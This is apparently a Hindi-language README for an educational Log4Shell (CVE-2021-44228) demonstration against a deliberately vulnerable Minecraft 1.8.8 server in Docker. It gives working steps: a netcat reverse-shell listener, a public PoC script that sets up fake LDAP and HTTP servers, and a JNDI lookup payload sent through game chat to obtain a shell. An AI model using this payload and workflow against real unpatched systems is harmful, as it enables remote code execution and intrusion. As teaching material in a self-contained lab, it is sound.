
Log4Shell (CVE-2021-44228) minecraft डेमो। शैक्षिक मेलों के लिए उपयोग किया जाता है।
यह प्रदर्शन शिक्षा मेलों में संभावित भावी छात्रों को HTL Villach में साइबर सुरक्षा विभाग का अंदाजा देने और यह दिखाने के लिए उपयोग किया जाता है कि रोजमर्रा के अनुप्रयोगों का कैसे शोषण किया जा सकता है।
नोट: यह पूरा प्रदर्शन Minecraft 1.8.8 का उपयोग करता है।
इस परिदृश्य में हमलावर kozmer द्वारा प्रस्तुत PoC का उपयोग कर रहा है। https://github.com/kozmer/log4j-shell-poc सभी श्रेय उन्हीं को जाता है। नोट: सभी कमांडों को attacker/ निर्देशिका में निष्पादित करने की आवश्यकता है।
pip install -r requirements.txt
nc -lvnp 9001
jdk1.8.0_20 होना चाहिए और उसी निर्देशिका में होना चाहिए।$ python3 poc.py --userip <docker-host का IP> --webport 8000 --lport 9001
[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc
[+] एक्सप्लॉइट जावा क्लास सफलतापूर्वक बनाई गई
[+] नकली LDAP सर्वर सेट अप किया जा रहा है
[+] मुझे भेजें: ${jndi:ldap://<docker-host का IP>:1389/a}
0.0.0.0:1389 पर सुन रहा है
यह स्क्रिप्ट आपके लिए HTTP सर्वर और LDAP सर्वर सेट करेगा, और यह वह पेलोड भी बनाएगा जिसे आप कमजोर पैरामीटर में चिपका सकते हैं। इसके बाद, अगर सब ठीक रहा, तो आपको lport पर एक शेल मिल जाना चाहिए।
पीड़ित इंस्टेंस पर हम JDK का एक पुराना और इसलिए कमजोर संस्करण (jdk1.8.0_20) उपयोग कर रहे हैं।
हमारा Minecraft सर्वर चलाने के लिए हमें अपनी Docker इमेज बनानी होगी और उसे चलाना होगा।
नोट: सफल बिल्ड के लिए आपको Minecraft Vanilla 1.8.8 सर्वर की अपनी प्रति प्राप्त करनी होगी (Mojang के EULA के कारण साझा नहीं किया जा सकता) संभावित स्रोत MCVERSIONS.NET हो सकता है।
फ़ाइल प्राप्त करने के बाद इसे victim/ में server.jar के रूप में सहेजें।
cd target/
docker build target/ -t minecraft-demo
हमारे द्वारा अभी बनाए गए कमजोर Minecraft सर्वर को docker का उपयोग करके चलाएँ
docker run --name vulnerable-server -p 25565:25565 minecraft-demo
संभावना है कि शोषण के बाद आपका कंटेनर रुक जाएगा या अटक जाएगा। उस स्थिति में आप निम्नलिखित कमांड का उपयोग करके इसे मार सकते हैं:
docker kill vulnerable-server
कमजोरी का शोषण करने के लिए बस गेम चैट में poc.py द्वारा प्रदान की गई स्ट्रिंग भेजें।
${jndi:ldap://<docker-host का IP>:1389/a}
